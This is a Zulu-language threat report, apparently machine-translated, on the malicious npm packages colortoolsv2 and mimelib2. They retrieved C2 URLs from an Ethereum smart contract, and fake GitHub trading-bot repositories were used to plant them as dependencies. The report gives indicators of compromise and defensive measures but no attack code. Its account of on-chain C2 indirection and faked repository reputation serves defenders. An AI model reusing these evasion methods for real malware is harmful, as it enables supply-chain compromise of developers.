- Amaphakheji we-npm anobungozi colortoolsv2 kanye ne-mimelib2 alande ama-C2 URLs kunkontileka ehlakaniphile ye-Ethereum ukuze agweme ukutholwa.
- I-on-chain indirection ivumela opharetha bazungezisa izindawo zokugcina ngaphandle kokushicilela kabusha amaphakheji; colortoolsv2 yasuswa ngoJulayi 7 ngaphambi kwe-pivot ku-mimelib2.
- I-GitHub push edidiyelwe isebenzise ama-faux trading-bot repos, izinkanyezi ezikhuphukile, kanye nokuzibophezela okubhaliwe ukufihla ukuncika okunonya.
- Ama-IoC afaka izinguqulo zephakheji, ama-SHA1 hashes, kanye nenkontileka 0x1f171a1b07c108eae05a5bccbe86922d66227e2b, kanye nesiqondiso sabavikeli.
Abalingisi abasabisayo baphendukele ebuqilini obusha: ukuhambisa ingqalasizinda enonya nge- Inkontileka ehlakaniphile ye-Ethereum yokufihla izikhombi zokulawula nokulawula (C2). esetshenziswa amaphakheji we-npm. Ngokusho kwe-ReversingLabs, amaphakheji amabili—i-colortoolsv2 ne-mimelib2—afinyelele buthule ku-blockchain ukuze abuyise ama-URL omthwalo okhokhelwayo wesigaba sesibili, ehlanekezela amasheke ajwayelekile abheka izizinda ezinamakhodi aqinile.
Esikhundleni sokuxhaphaza isiphazamisi ku-Ethereum ngokwayo, uhlelo lusebenzisa inethiwekhi njenge-a isendlalelo esisesidlangalaleni, esiqinile. Ngemuva kokuthi i-colortoolsv2 ivinjwe ngo-npm ngoJulayi 7, o-opharetha bashintshele ngokushesha ku-mimelib2 ngomqondo ocishe ufane, beqhubeka nokubhekisela kwinkontileka ye-on-chain efanayo yesinyathelo esilandelayo.
Ukusuka ekufakweni kwe-npm kuye ekubhekeni kwe-on-chain: indlela i-detour esebenza ngayo
Ngaphakathi kwe-colortoolsv2, isilayishi esincane (index.js) sisebenze njengesithuthi icele umyalo wangaphandle futhi yalanda ithagethi yayo kwinkontileka ehlakaniphile esikhundleni sombhalo wendawo noma ukumisa okumile. I-Etherscan ibonisa inkontileka kokuthi 0x1f171a1b07c108eae05a5bccbe86922d66227e2b, imisebenzi yayo yokufunda ebuyisele i-URL esetshenziswe ukufinyelela isevisi ye-C2.
Lokhu kuvinjwa kwesikhombi se-on-chain kuyinkimbinkimbi: abavikeli abakwazanga ukuthembela ekutholeni noma ekufakweni kuhlu kwesizinda esinekhodi eqinile kuphakheji ngoba indawo yokugcina esebenzayo yayiphila ngemuva kwenkontileka abaqhubi abayilawulayo. Ukuzungezisa izindawo bekudinga kuphela ukubuyekezwa kwesitoreji senkontileka, ukungashicileli kabusha i-artifact ye-npm, nanoma iyiphi ithrafikhi ewumphumela ye-blockchain ehlanganiswe njengokusemthethweni.
Uma isikhishiwe ngesikhathi sokufaka noma sokusebenza, isilayishi sibuyise a second-stage component (SHA1 021d0eef8f457eb2a9f9fb2260dd2e39ff009a21), ebisingatha umsebenzi wokulandela. Ilinganisa ukuziphatha kwe-colortoolsv2, i-mimelib2 iphinde yasebenzisa inkontileka efanayo ngenjongo efanayo enezindlela zekhodi ezicishe zifane.
I-ReversingLabs ichaze le ndlela njengengavamile ku-npm ecosystem: ama-URL anonya asingathwe ngesimo senkontileka ehlakaniphile, hhayi ezinsizeni zewebhu ezivamile ezivame ukubonakala emikhankasweni ye-supply chain (isb., isitoreji samafu noma izinkulumo).
Intuthu ye-GitHub nezibuko: i-fake trading-bot repos njengekhava
Amaphakheji we-npm awazange avele eyedwa. Abasebenzisi basukume inethiwekhi yamaphrojekthi we-GitHub ethulwe njengezinsiza zokuhweba ze-crypto-amakhosombe afana ne-solana-trading-bot-v2- bese uwaxhumanisa nezinto ezinonya. Kumuntu obukele nje, lezi zindawo zibukeka “ziphila,” ziziqhayisa ngezinkulungwane zemisebenzi, abalondolozi abaningi, izinkanyezi, nababukeli.
Ukubhekisisa kahle kwembula ukuthi umsebenzi omningi wawubhalwe phansi futhi ukha phezulu, okuhlanganisa ukuphindaphinda kwefayela lelayisense ama-akhawunti asanda kwenziwa anokuqukethwe okuyingcosana (ezinye zidalwe cishe ngomhlaka-10 Julayi ngamafayela e-README njengamancane njengokuthi “Sawubona”). Amagama omsebenzisi avele emlandweni wokuzibophezela—okuhlanganisa i-slunfuedrac, i-cnaovalles, ne-pasttimerles—avele kaningi kuwo wonke amaphrojekthi esiteji.
Ukuzibophezela kubonise ngqo lapho amaphakheji afakwe ku-codebase—ingeza colortoolsv2 futhi kamuva mimelib2 njengokuncika kuma-bot.ts, kanye nezinto ezingeniswayo ezihambisanayo ezivela ku-src/index.ts. Ubufakazi bomphakathi obukhiqiziwe benza ukufakwa kokuncika kucace kakhulu ngesikhathi sokubuyekezwa okukha phezulu.
Empeleni, i-façade ye-GitHub ikhulise amasiginali wokuthemba ngenkathi i- iphuzu langempela lesinqumo somnyakazo olandelayo we-malware uhlala ku-Ethereum. Ngokuhlukanisa ubunjiniyela bezenhlalakahle (i-GitHub) ekulawuleni (inkontileka ehlakaniphile), opharetha benze umkhankaso waba nzima ukubona nokuphazamisa.
Ama-IoC nezinyathelo eziqinile zabavikeli
I-ReversingLabs ishicilele uhlu oluningiliziwe lwama-artifacts axhunywe kulo msebenzi, kanye nereferensi eyinhloko ye-on-chain eqhube isigaba sesibili. Izinto ezilandelayo zingasetshenziswa ukwenza zingela, uvimbe, futhi uqinisekise ukuchayeka kumapayipi okwakha kanye nezindawo zokusebenza zonjiniyela:
- npm packages: colortoolsv2 1.0.0 (SHA1 678c20775ff86b014ae8d9869ce5c41ee06b6215), 1.0.1 (1bb7b23f45ed80bce33a6b6e6bc4f99750d5a34b), 1.0.2 (db86351f938a55756061e9b1f4469ff2699e9e27)
- npm packages: mimelib2 1.0.0 (bda31e9022f5994385c26bd8a451acf0cd0b36da), 1.0.1 (c5488b605cf3e9e9ef35da407ea848cf0326fdea)
- Second stage: SHA1 021d0eef8f457eb2a9f9fb2260dd2e39ff009a21
- Inkontileka ehlakaniphile esetshenziselwa indlela ye-C2: 0x1f171a1b07c108eae05a5bccbe86922d66227e2b
Okuqukethwe okwengeziwe okuvela esigabeni sokwehliswa: colortoolsv2 ikhishwe ku-npm ngoJulayi 7, ngemva kwalokho o-opharetha bashintshele ku-mimelib2 ngereferensi ye-on-chain efanayo kanye nokuziphatha kwesilayishi okucishe kufane.
Izenzo ezinconyiwe zonjiniyela namathimba okuvikela zihlanganisa: hlaba umkhosi ekubukeni kwe-on-chain okwenziwa ngokufaka imibhalo; vimba noma uxwayise ngokwenziwa kwe-child_process kumahhuku omjikelezo wokuphila wephakheji; yenqaba ukuphuma kwenethiwekhi phakathi nokufakwa kwe-npm ku-CI; ukuphoqelela izinhlu zezimvume zamarejistri nabalondolozi; vala izinguqulo eziguqukayo; kanye nokuqapha izicelo eziboshelwe ekhelini lenkontileka elingenhla.
Ngobubanzi, phatha amamethrikhi okuduma kwekhosombe njengamasiginali okungezona ezokuvikela. Ukwethenjwa kufanele kusuke kukhodi, ama-artifact, nezinkomba zenethiwekhi, hhayi ukubala kwezinkanyezi, ivolumu yokwenziwa, noma ukubukeka “kwabanakekeli” abaningi. Ukuqinisekisa okuzimele—ukuhlaziya okumile, ukwenziwa kwe-sandboxed, kanye nokuhlolwa kokusebenza okuqhutshwa yi-SBOM—kusabalulekile.
Okugqamayo kulo mkhankaso akulona iphutha ku-Ethereum, npm, noma i-GitHub ngayinye, kodwa indlela ingqalasizinda yomphakathi engalukwa ngayo ochungechungeni lokulethwa okuyimfihlo. Ngu ukuhambisa ukutholwa kwe-C2 kunkontileka ehlakaniphile kanye nokwethembeka okuntshontshiwe nge-GitHub, abalingisi banweba ukubonwa kwendabuko ngaphandle kwesimo. Ukuqaphela ukuncika kwenhlanzeko nezilawuli ezinezingqimba ziyi-counterweight.
